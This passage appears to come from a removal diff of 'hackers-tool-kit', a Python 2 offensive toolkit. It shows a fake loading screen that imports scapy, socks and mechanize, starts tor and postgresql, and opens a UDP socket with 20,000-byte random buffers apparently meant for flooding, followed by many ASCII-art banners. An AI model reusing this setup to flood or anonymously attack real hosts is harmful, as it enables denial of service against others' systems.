* ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -import readline -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -#COLOR VARIABLES START# -#---------------------# -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' - -lred = '\033[91m' -lblue = '\033[94m' -lgreen = '\033[92m' -yellow = '\033[93m' -cyan = '\033[1;36m' -purple = '\033[95m' -red = '\033[31m' -green = '\033[32m' -blue = '\033[34m' -orange = '\033[33m' - -colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] -randomcolor = random.choice(colorlist) -#-------------------# -#COLOR VARIABLES END# - -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] [ \033[1m\033[32mREADY \033[0m]" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @tuf_unkn0wn\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -#----------------------------------------------# -#this is the loading screen \ the imports END# - - -#MAIN STARTING BANNER START# -#--------------------------# -def mainbanner1(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def mainbanner2(): - print """ - type ? for help -\033[92m - ▄█ ▄█ ▄█ - ███ ███ ███ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███ ███ ███ - ███ ███ ███ - █▀ █▀ █▀ - - ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ - ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m - ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ - ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m - │ │ ││ ││───├┴┐│ │ - ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m -Created By @tuf_unkn0wn - """.decode('utf-8') -def mainbanner3(): - print """\033[91m - ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ - ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ - ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ - ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ - ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ - ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ - ░░ ░▒ ░ ░░ ░▒ ░ - ░ ░ ░ ░ - ░ ░ ░ ░ - \033[90m - - ████████████████████ - ██ ██\033[91m - ▒▒ ▒▒ - ░░ ░░ - ░ ░ - ░ ░\033[0m - -888 888 88888888888 888 d8P -888 888 888 888 d8P -888 888 888 888 d8P \033[1;36m -8888888888 888 888d88K -888 888 888 8888888b\033[0m -888 888 888888 888 888888 888 Y88b -888 888 888 888 Y88b -888 888 888 888 Y88b - Created By @tuf_unkn0wn On Instagram - type ? for help - """.decode('utf-8') -def mainbanner4(): - print P+""" - .S S. sdSS_SSSSSSbs .S S. - .SS SS. YSSS~S%SSSSSP .SS SS. - S%S S%S S%S S%S S&S - S%S S%S S%S S%S d*S - S%S SSSS%S S&S S&S .S*S - S&S SSS&S S&S S&S_sdSSS - S&S S&S S&S S&S~YSSY%b - S&S S&S S&S S&S `S% - S*S S*S S*S S*S S% - S*S S*S S*S S*S n& - S*S S*S S*S S*S wS& - SSS S*S S*S S*S 0 SS - h SP SP SP n - a Y Y Y k - c n - k e r s - t o o l - k i t by @tuf_u\033[0m - - type ? for help - """.decode('utf-8') -def mainbanner5(): - print R+""" - ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ - ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ - ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ - ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ - ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ - ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ - ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ - ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ - ░\033[0m - .,,,,,,,,,,.,,,.....,........................... - ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, - ..,......,.....,,.,........,,...........,,.,.... - ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ - ***********************//***/***//**/********** - ****************** ****************** @tuf_unkn0wn - *,*****,*,******** ***,************** - **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** type ? for help - ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, - ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, - ***********************************************\033[91m - - ▄████▄ █ ██ ▄▄▄█████▓ ██████ - ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ - ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ - ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ - ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ - ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ - ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ - ░ ░░░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ - ░ \033[0m - """.decode('utf-8') -def mainbanner6(): - print """ - |-|____________________ - /|_|_\ /__,''___ /____ /| - |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| - |``````|_________|`````| | - | \033[93m~~~~~~~~~~~~~~\033[0m | | - | .-/\-, | | - | _\\//_ | | - | \033[92m| /(_)|\033[0m | | - |\033[92m_______|_||.-.|_______\033[0m|/| - |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| - |\033[92m```````|_||:_)|```````\033[0m| | - | \033[92m|______| \033[0m| | - | ______ | | - | (__\033[90m24\033[0m__) | | - | ~~~~~~~~ | | - | By @tuf_unkn0wn | | - |______________________|/ - \033[91m - ) ( ) ( - ( /( )\ ) ( /( )\ ( ( ( - )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( - ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ - | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) - | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< - |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ - |___/ - \033[90m - ) - (\033[33m - _ \033[0m___________ \033[90m)\033[33m - [_[\033[0m___________\033[91m#\033[0m - type ? for help - """.decode('utf-8') -def mainbanner7(): - os.system("cat /root/hackers-tool-kit/tools/skull.txt") -def mainbanner8(): - print """ - type ? for help\033[91m - -@@@ /$$ /$$ @@@ -@@@ | $$ | $$ @@@ -@@! | $$ | $$ @@! -!@! | $$$$$$$$ !@! -!!@ | $$__ $$ !!@ -!!! | $$ | $$ !!! -!!: | $$ | $$ !!: -:!: |__/ |__/ :!: -@@@ @@@\033[94m -@@@ @@@ -@@! @@! -!@! /$$$$$$$$ !@! -!!@ |__ $$__/ !!@ -!!! | $$ !!! -!!: | $$ !!: -:!:---------------| $$---------------:!: -@@@ | $$ @@@ -@@@ | $$ @@@ -@@! |__/ @@! -!@! !@!\033[91m -!!@ !!@ -!!! /$$ /$$ !!! -!!: | $$ /$$/ !!: -:!: | $$ /$$/ :!: -@@@ | $$$$$/ @@@ -@@@ | $$ $$ @@@ -@@! | $$\ $$ @@! -!@! | $$ \ $$ !@! -!!@ |__/ \__/ !!@ -!!! !!! -!!: !!: -:!: :!:\033[92m - :: :: -: @tuf_unkn0wn :\033[0m -""" -def mainbanner9(): - print """ -\033[91m╔\033[0m██████████████████████████████████████████████████████████████████\033[91m═╗ -║ ║ -\033[33m║ ║ -║\033[0m ▄▀▀▀▀▄ ▄▀▀▄ ▀▀▄ ▄▀▀▀▀▄ ▄▀▀▀█▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀▄ ▄▀▄ \033[33m║ -\033[93m║\033[0m █ █ ▐ █ ▀▄ ▄▀ █ █ ▐ █ █ ▐ ▐ ▄▀ ▐ █ █ ▀ █ \033[93m║ -║\033[0m ▀▄ ▐ █ ▀▄ ▐ █ █▄▄▄▄▄ ▐ █ █ \033[93m║ -\033[92m║\033[0m ▀▄ █ █ ▀▄ █ █ █ ▌ █ █ \033[92m║ -║\033[0m █▀▀▀ ▄▀ █▀▀▀ ▄▀ ▄▀▄▄▄▄ ▄▀ ▄▀ \033[92m║ -\033[1;36m║\033[0m ▐ █ ▐ █ █ ▐ █ █ \033[1;36m║ -║\033[0m ▐ ▐ ▐ ▐ ▐ \033[1;36m║ -\033[94m║\033[0m ▄▀▀█▄▄ ▄▀▀▀▀▄ ▄▀▀▄ ▄▀▀▄ ▄▀▀▄ ▀▄ \033[94m║ -║\033[0m █ ▄▀ █ █ █ █ █ ▐ █ █ █ █ █ \033[94m ║ -\033[34m║\033[0m ▐ █ █ █ █ ▐ █ █ ▐ █ ▀█ \033[34m║ -║\033[0m █ █ ▀▄ ▄▀ █ ▄ █ █ █ \033[34m║ -\033[95m║\033[0m ▄▀▄▄▄▄▀ ▀▀▀▀ ▀▄▀ ▀▄ ▄▀ ▄▀ █ \033[95m║ -║\033[0m █ ▐ ▀ █ ▐ \033[95m║ -\033[35m║\033[0m ▐ ▐ \033[35m║ -║ ║\033[1;31m -╚═\033[0m█████████████████████████████████████████████████████████████████\033[1;31m═╝\033[0m - type ? for help - """.decode('utf-8') - -def mainbanner10(): - print """\033[0m - ░░░▓█▒░▒▒▒▓▓░ - ░░░░░▓▓░▒▓▓▓▓▓▓▓▓▓▓▓█░░░░ - ░░█▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░ - ░░█▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░░ - ░░░░ ░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██░░ ░░░░ - ░░░░░░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████▒░░ ░░▓▒▒▒▒▓░░ - ░▓░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████▓░░░░░▒▓▓▓▓▓▓███████ - ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█████████████████████████████████░░░░░░░ - ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓██████████████████████████████████░ - ░█▓▓▓██████████▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████████████████████▒░ - ░▒▓▓▓████░░░░░░░░░░░░░▒▓███████████████████████████████████████░░ - ░▓▓▓███▒▒░░░░░░░░░░░░░░░░░░░░▒██▓██████████████████████████████░░ - ░█▓▓███░░░░░░░░░░░░░░░░░░░░░░░░░░░▒███████████████████████████▓░ - ░█▓▓███▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░█████████████████░░░░░░░░░ - ░░▓▓████░░░░░░░░░░░░░░░░░░░░████▓░░░░░░░░█████████████▓░ - ░█▓█████░░░░░░░░░░░░░░░░░▒░████████░░░░░░░████████████░░ - ░░▒▓█████░░░░▒░▓████░░░░░░▒░█████████▓░░░░░███████████▓░░░░░ - ░░▓▒▓█████░░░▒░▓██████░░░░░▒░▓█████████░░░░░▒██████████░░▒▒▓░ - ░░█▒▓▓████▒░░░░███████▓░░░░░▒░░████████▓░░░░▒████████░▓░▓▓░▓▓░░░ - ░░░▒▓▓▓████░░░░▓██████▓░░░░░░▒░░░▓█████░░░░░███████▓░▓▓▓▓▓▓▒▒░░░ - ░▒▒▓▓████░░▒░░██████░░░░░░░░░▒░░░░░░▒░░░░░████▓░▒▓▓▓▓▓░░░▒▒▒░▒░ - ░░▓▓████░░░▒░░▒███░░▒▓▒▒█▓░░░░░░░░░░░░░▒██▓▒▓▓▓▓▓▓▒░░░░░░▒▒▒▒▒░░ - ░░░░████░░░░░░░░░░░░░█░░▓█▓░░░░██████████▒▒▓▓▓▓░░░░░▒░░░░░▒▒▒▒▒░ - ░░░░░░ ░░████░░░░░░░░░░░░░░░░░░░░░░███████▓▒▓▓░░░░░░░ ░░░░░░░▒▒▒░▒░ - ░▒░░▒░░░▒░▒█████▓▒░▒█░░░░░░░░░░░░░░░░███▓▒▓▒░░ ░▒░░░░▒▒▒░░░░ - ░░▒░▒░░░░░░░██████████░░░░░░▒░░░▒░░▒▒▒▒▒▒▒░░░ ░▒░░░░▒▒░▒░░ - ▒░░░░░▒▒▒░░░░░░██████░░▒▒▒▒▒▒▒▒▒▓█▓▓▒▒▓▓▓█░ ░░▒░░░░▒▒▒░░ - ░░░░░░▒▒░░░░ ░░▓▓▓▓▓▓▓█▓▓▒▒▓▓█▓▓▓▓▓█ \033[92m@tuf_unkn0wn\033[0m ░░░░░░░▒░░░ - ░░▒░░░░░▒▓█ ░▒▒▓▓▓▓█▓█▓▓▒▒▓▓██▓▓▓▓▓▓█ \033[94mtype ? for help\033[0m ░░░░░▒▒░░ - ░▒░░░░█▓██▒░▒▓▓██▓▒▒▒▒▓▒▓▓████▓▓▓▓▓██▒ ▒░░░░░▒░░ - ░░▓▒█▓▓▓▓▓▓▓██▓▒▒░▒▒▒▒█▓▓███▓▓▓▓▓▓█░ ▒░░░░▒░ - ░▒███▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒░▒████▓▓▓▓▓▓▒░ ▒░░░░░ - ░████▓▓▓▓▓▓▓▒▓▓▓▓█▒▒░░▒░█▓█▓█▓████░ ▒░░▒░░ - ░▓██▓▓▓▓▓▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▓▓█▓▓▓▓██▒░ ░░▒░ - ░░██▓▓▒▓▓██▓▓▓▓▓▓▓▓▓████▓▓▓▓█▓▓█░░░ - ░██▓▓███▒▓▓▓▓▓▓▓▓▓█████▓██▓██░░ - ░░█▓█░░ ░▒▒▓▓▓▓▓▓▓▓▓███▓██▓█░ - ▓█░ ░█▓▓▓▓▓▓▓▓▓████▓███░ ░ - ░█▓▓▓▓▓▓███████▓██▓██░ - ░██▓▓▓████████████████░░░ - ░▓▓▓▓▓███████▓█▓████████░ ░░░ - ░░░█▓█████████████████████████▓▓▓▒░░░░░░ - ░░░▒█▓█▓██████████████████████▓███████████████░░░░░░░░░ - ▓█▒▓▓▓▓▓▓█████████████████████████████████████████████████░ - ░█▓▓▓▓▓▓▓▓▓█████████████████████████████████████▒░░░ ░ ░░░░ - ░░▓█▓█▓█████████████████████████████░░ - \033[0m""".decode('utf-8') -def mainbanner11(): - print """\033[91m - ██████╗ ██████╗ ██████╗ - ██╔════╝ ██╔════╝ ██╔════╝ - ███████╗ ███████╗ ███████╗ - ██╔═══██╗██╔═══██╗██╔═══██╗ - ╚██████╔╝╚██████╔╝╚██████╔╝ - ╚═════╝ ╚═════╝ ╚═════╝ - ░░░░ ░░░░░ - ░▒███████▓▒░░ ░░░████████▓░░░ - ░▓████████████▒░░ ░░█████████████░░ - ▒▓░ ░░████████░░ ░░████████░░░ ░░▒█░ - ░ ░██████▒░ ░░░░███████ ░░ - ░░███████░░ ░░██████▓░ - ░███████░░ ░▒██████▒ - ░░░░ ░░███████░░░███████▒░ ░░░ - ░░░░░ ░░░███████░████████░░░ ░░░ ░░░░ - ░░▓████▓▒░░░░▒▒███████████████░░░░░░░▒▓████░ ░ - ░▒██████████████▒████████▒██████████████░░ - ░░██████████████▒░███▒▒▒█████████████░░ - ░░░░▓████████░█░▓▓▒████████▒░░░░░ - ░░████████▓░██░████████▒░░░ - ░░▒██████░▒▒░░▒░░██████░ - ░░█████████▓░█░████▓███▓░ - ░▒█▓░▒██████▒███████░░█▓░ - ░░░███████████████████▓░░ - ░▒▓████████████████▒░ - ░░▒███████████████▓▒░ - ░▒█████▓██████░░ - ░██████████░ - @tuf_unkn0wn ░█████████▒ type ? for help - █████████░░ - ░░████████░░ - ░▓█████▓░ - ░▓████▒░ - ░░████░ - ░░░▒██░░ - ░█▓░ - ░░▓░░ - ░░░░░ - ░░ - \033[0m""".decode('utf-8') -def mainbanner12(): - print """\033[91m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ -██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') -def mainbanner13(): - print """\033[92m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ -██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') -def mainbanner14(): - print """\033[34m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ -██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') -def mainbanner15(): - print """\033[93m - __ _ - _wr"" "-q__ - _dP 9m_ - _#P 9#_ - d#@ \033[92mtype ? for help\033[93m 9#m - d## ### - J### ###L - {###K J###K - ]####K ___aaa___ J####F - __gmM######_ w#P"" ""9#m _d#####Mmw__ - _g##############mZ_ __g##############m_ - _d####M@PPPP@@M#######Mmp gm#########@@PPP9@M####m_ - a###"" ,Z"#####@" '######"\g ""M##m - J#@" 0L "*## ##@" J# *#K - #" `# "_gmwgm_~ dF `#_ -7F "#_ ]#####F _dK JE -] *m__ ##### __g@" F - \033[92m@tuf_unkn0wn\033[93m "PJ#####LP" \033[92mhackers-tool-kit\033[93m - ` 0######_ ' - _0########_ - . _d#####^#####m__ , - "*w_________am#####P" ~9#####mw_________w*" - ""9@#####@M"" ""P@#####@M"" -\033[92m - ██░ ██ ▄▄▄█████▓ ██ ▄█▀ - ▓██░ ██▒▓ ██▒ ▓▒ ██▄█▒ - ▒██▀▀██░▒ ▓██░ ▒░▓███▄░ - ░▓█ ░██ ░ ▓██▓ ░ ▓██ █▄ - ░▓█▒░██▓ ▒██▒ ░ ▒██▒ █▄ - ▒ ░░▒░▒ ▒ ░░ ▒ ▒▒ ▓▒ - ▒ ░▒░ ░ ░ ░ ░▒ ▒░ - ░ ░░ ░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░\033[0m - """.decode('utf-8') -def mainbanner16(): - print """\033[91m - :PB@Bk: - ,jB@@B@B@B@BBL. - 7G@B@B@BMMMMMB@B@B@Nr - :kB@B@@@MMOMOMOMOMMMM@B@B@B1, - :5@B@B@B@BBMMOMOMOMOMOMOMM@@@B@B@BBu. - 70@@@B@B@B@BXBBOMOMOMOMOMOMMBMPB@B@B@B@B@Nr - G@@@BJ iB@B@@ OBMOMOMOMOMOMOM@2 B@B@B. EB@B@S - @@BM@GJBU. iSuB@OMOMOMOMOMOMM@OU1: .kBLM@M@B@ - B@MMB@B 7@BBMMOMOMOMOMOBB@: B@BMM@B - @@@B@B 7@@@MMOMOMOMM@B@: @@B@B@ - @@OLB. BNB@MMOMOMM@BEB rBjM@B - @@ @ M OBOMOMM@q M .@ @@ - @@OvB B:u@MMO\033[31mMOMMBJiB .BvM@B - @B@B@J 0@B@MMOMOMOMB@B@u q@@@B@ - B@MBB@v G@@BMMMMMMMMMMMBB@5 F@BMM@B - @BBM@BPNi LMEB@OMMMM@B@MMOMM@BZM7 rEqB@MBB@ - B@@@BM B@B@B qBMOMB@B@B@BMOMBL B@B@B @B@B@M - J@@@@PB@B@B@B7G@OMBB. ,@MMM@qLB@B@@@BqB@BBv - iGB@,i0@M@B@MMO@E : M@OMM@@@B@Pii@@N: - . B@M@B@MMM@B@B@B@MMM@@@M@B - @B@B.i@MBB@B@B@@BM@::B@B@ - B@@@ .B@B.:@B@ :B@B @B@O - :0 r@B@ B@@ .@B@: P: - vMB :@B@ :BO7 - ,B@B\033[0m - - \033[32m╔═══\033[93m+\033[0mHackers-Tool-Kit\033[93m+\033[32m════╗\033[0m - ███████████████████████████ - type █?█ for help - ███ - \033[31m▄▄ ▄▄ \033[0m███\033[31m ▄▄ ▄▄▄ - ██ ██ \033[0m███\033[31m ██ ██▀ - ██ ██ \033[0m███\033[31m ██▄██ - ████████ \033[0m███\033[31m █████ - ██ ██ \033[0m███\033[31m ██ ██▄ - ██ ██ \033[0m███\033[31m ██ ██▄ - ▀▀ ▀▀ \033[0m▀▀▀\033[31m ▀▀ ▀▀\033[0m - """.decode('utf-8') -def mainbanner17(): - print """ - - .---. - |---| - type |-\033[32m?\033[0m-| for help - |---| - .---^ - ^---. - :___________: - \033[31m▄█ █▄\033[0m | |//| \033[32m▄█ ▄█▄\033[0m - ███ ███ | |//| ███ ▄███▀ - ███ ███ | |//| ███▐██▀ - ███▄▄▄▄███ | |//| █████▀ - ███▀▀▀▀███ | |//| █████▄ - ███ ███ | |//| ███▐██▄ - ███ ███ | |.-| ███ ▀███▄ - \033[31m███ ███\033[0m |.-'**| \033[32m███ ▀█▀\033[0m - \***/ - \*\033[91m/\033[31m - V\033[0m - """.decode('utf-8') -def mainbanner18(): - print """ - Type \033[31m?\033[0m For\033[31m Help\033[0m -\033[31m╔═══╗ ╔═══╗ ╔═════════════════════╗ ╔═══╗ ╔═══╗ -║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m║ -║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔═╝\033[0mHTK\033[31m╔╝ -║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ╚════════╗\033[0mHTK\033[31m╔════════╝ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m╔═╝ -║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║╔╝\033[0mHTK\033[31m╔╝ -║\033[0mHTK\033[31m╚═══════════╝\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m╚╝\033[0mHTK\033[31m╔╝ -║\033[0mHTKHHHHHHHHHHHHHHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK HTK\033[31m╔╝ -║\033[0mHTKTTTTTTTTTTTTTHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTK \033[31m╚╗\033[0m -║\033[31mHTKKKKKKKKKKKKKKHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m╔╗\033[31mHTK\033[0m╚═╗ -║\033[31mHTK\033[0m╔═══════════╗\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║╚═╗\033[31mHTK\033[0m╚╗ -║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ -║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ -║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ -║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ 